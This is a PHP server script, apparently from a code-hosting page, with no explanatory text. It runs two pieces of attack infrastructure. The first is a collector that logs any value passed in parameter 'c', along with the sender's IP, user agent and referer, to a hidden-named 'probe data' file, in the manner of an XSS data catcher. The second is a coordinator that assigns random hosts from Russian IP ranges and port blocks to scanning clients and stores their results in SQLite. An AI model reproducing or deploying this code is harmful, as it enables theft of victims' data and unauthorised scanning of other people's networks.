You can not select more than 25 topics
Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.
186 lines
5.6 KiB
186 lines
5.6 KiB
<?php |
|
header("Access-Control-Allow-Origin: *"); |
|
header("Access-Control-Allow-Methods: GET, POST, OPTIONS, PUT, PATCH, DELETE"); |
|
header("Access-Control-Allow-Headers: Content-Type, Authorization"); |
|
header("Access-Control-Allow-Credentials: true"); |
|
|
|
if ($_SERVER['REQUEST_METHOD'] === 'OPTIONS') { |
|
http_response_code(200); |
|
exit(); |
|
} |
|
|
|
function mlog($logMessage, $logFilePath = './logfile.log') { |
|
$logTimestamp = date('Y-m-d H:i:s'); |
|
$logEntry = "[{$logTimestamp}] {$logMessage}\n"; |
|
$fileHandle = fopen($logFilePath, 'a'); |
|
if ($fileHandle) { |
|
fwrite($fileHandle, $logEntry); |
|
fclose($fileHandle); |
|
} else { |
|
echo "error: log file."; |
|
} |
|
} |
|
function get_real_ip(){ |
|
$ip=false; |
|
if(!empty($_SERVER["HTTP_CLIENT_IP"])) |
|
{ |
|
$ip = $_SERVER["HTTP_CLIENT_IP"]; |
|
} |
|
if (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) |
|
{ |
|
$ips = explode (", ", $_SERVER['HTTP_X_FORWARDED_FOR']); |
|
if ($ip) |
|
{ |
|
array_unshift($ips, $ip); $ip = FALSE; |
|
} |
|
for ($i = 0; $i < count($ips); $i++) |
|
{ |
|
if (!eregi ("^(10|172\.16|192\.168)\.", $ips[$i])) |
|
{ |
|
$ip = $ips[$i]; |
|
break; |
|
} |
|
} |
|
} |
|
return ($ip ? $ip : $_SERVER['REMOTE_ADDR']); |
|
} |
|
|
|
function get_user_agent(){ |
|
return $_SERVER['HTTP_USER_AGENT']; |
|
} |
|
|
|
function get_referer(){ |
|
return $_SERVER['HTTP_REFERER']; |
|
} |
|
|
|
function quotes($content){ |
|
if(htmlspecialchars($content)){ |
|
if(is_array($content)){ |
|
foreach($content as $key=>$value){ |
|
$content[$key] = stripslashes($value); |
|
} |
|
}else{ |
|
$content = stripslashes($content);} |
|
}else{} |
|
return $content; |
|
} |
|
|
|
if (!empty($_REQUEST["c"])){ |
|
$curtime = date("Y-m-d H:i:s"); |
|
$ip = get_real_ip(); |
|
$useragent = get_user_agent(); |
|
$referer = get_referer(); |
|
$data = $_REQUEST["c"]; |
|
if(!file_exists("HujGrskagyuasd.html")){ |
|
$fp = fopen("HujGrskagyuasd.html", "a+"); |
|
fwrite($fp, '<head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><title>probe data</title><style>body{font-size:13px;}</style></head>'); |
|
fclose($fp); |
|
} |
|
$fp = fopen("HujGrskagyuasd.html", "a+"); |
|
fwrite($fp, "".htmlspecialchars(quotes($ip))." | $curtime <br />UserAgent: ".htmlspecialchars(quotes($useragent))." <br />Referer: ".htmlspecialchars(quotes($referer))." <br />DATA: ".htmlspecialchars(quotes($data))."<br /><br />"); |
|
fclose($fp); |
|
} |
|
|
|
|
|
########################################################################################## |
|
|
|
function db_insert($jsonData) { |
|
$db = new SQLite3('./jhasgdkyuasAHLhiahusd.db'); |
|
if (!$db) { |
|
die("Connection failed: " . $db->lastErrorMsg()); |
|
} |
|
$query = 'CREATE TABLE IF NOT EXISTS scan (id INTEGER PRIMARY KEY, host TEXT, port INTEGER, res TEXT, time_scan DATETIME)'; |
|
$db->exec($query); |
|
// Insert data |
|
$time = time(); |
|
$host = $jsonData['host']; |
|
|
|
$insertOrUpdateQuery = $db->prepare('INSERT OR REPLACE INTO scan (host, port, res, time_scan) VALUES (:host, :port, :res, :time_scan)'); |
|
if ($jsonData !== null && isset($jsonData['ports']) && is_array($jsonData['ports'])) { |
|
foreach ($jsonData['ports'] as $port => $res) { |
|
$insertOrUpdateQuery->bindValue(':host', $host, SQLITE3_TEXT); |
|
$insertOrUpdateQuery->bindValue(':port', $port, SQLITE3_INTEGER); |
|
$insertOrUpdateQuery->bindValue(':res', $res, SQLITE3_TEXT); |
|
$insertOrUpdateQuery->bindValue(':time_scan', $time,SQLITE3_INTEGER); |
|
$insertOrUpdateQuery->execute(); |
|
} |
|
$db->exec('COMMIT'); |
|
$db->close(); |
|
} |
|
} |
|
|
|
function v4CIDRtoMask($cidr) { |
|
$cidr = explode('/', $cidr); |
|
return array($cidr[0], long2ip(-1 << (32 - (int)$cidr[1]))); |
|
} |
|
|
|
function ipv4Breakout ($ip_address, $ip_nmask) { |
|
$ip_address_long = ip2long($ip_address); |
|
$ip_nmask_long = ip2long($ip_nmask); |
|
$ip_net = $ip_address_long & $ip_nmask_long; |
|
$ip_host_first = ((~$ip_nmask_long) & $ip_address_long); |
|
$ip_first = ($ip_address_long ^ $ip_host_first) + 1; |
|
$ip_broadcast_invert = ~$ip_nmask_long; |
|
$ip_last = ($ip_address_long | $ip_broadcast_invert) - 1; |
|
$ip_broadcast = $ip_address_long | $ip_broadcast_invert; |
|
$ip_net_short = long2ip($ip_net); |
|
$ip_first_short = long2ip($ip_first); |
|
$ip_last_short = long2ip($ip_last); |
|
$ip_broadcast_short = long2ip($ip_broadcast); |
|
return long2ip(random_int(ip2long($ip_first_short), ip2long($ip_last_short))); |
|
} |
|
|
|
function selectIp ($country = 'ru') { |
|
$line = ""; |
|
if ($country == 'ru') { |
|
$f_contents = file("ru.cidr"); |
|
$line = $f_contents[rand(0, count($f_contents) - 1)]; |
|
} |
|
return $line; |
|
} |
|
function sendScanRange() { |
|
$ip_range = selectIp("ru"); |
|
if ($ip_range == "") { |
|
exit(); |
|
} |
|
$addr=v4CIDRtoMask($ip_range); |
|
$host=ipv4Breakout ($addr[0], $addr[1]); |
|
$p = random_int(0,65); |
|
if ($p == 65) { |
|
$ports_arr = range(65000,65535); |
|
} else if ($p == 0) { |
|
$ports_arr = range(1,1000-1); |
|
} else { |
|
$p1 = $p*1000; |
|
$p2 = ($p+1)*1000 -1; |
|
$ports_arr = range($p1,$p2); |
|
} |
|
shuffle($ports_arr); |
|
$response = [ |
|
'scan' => 'true', |
|
'host' => $host, |
|
'scan_max_time' => '500', |
|
'scan_thread' => '100', |
|
]; |
|
$ports = ['ports' => $ports_arr]; |
|
$response = array_merge($response, $ports); |
|
header('Content-Type: application/json'); |
|
echo json_encode($response); |
|
exit(); |
|
} |
|
$postData = json_decode(file_get_contents('php://input'), true); |
|
if (isset($postData['data'])) { |
|
if ($postData['data'] == 'false' ) { |
|
sendScanRange(); |
|
} |
|
} |
|
if (isset($postData['type'])) { |
|
if ($postData['type'] == 'scan_port') { |
|
db_insert($postData); |
|
http_response_code(200); |
|
echo json_encode('{res:ok}'); |
|
} |
|
} |
|
exit(); |
|
?> |
|
|
|
|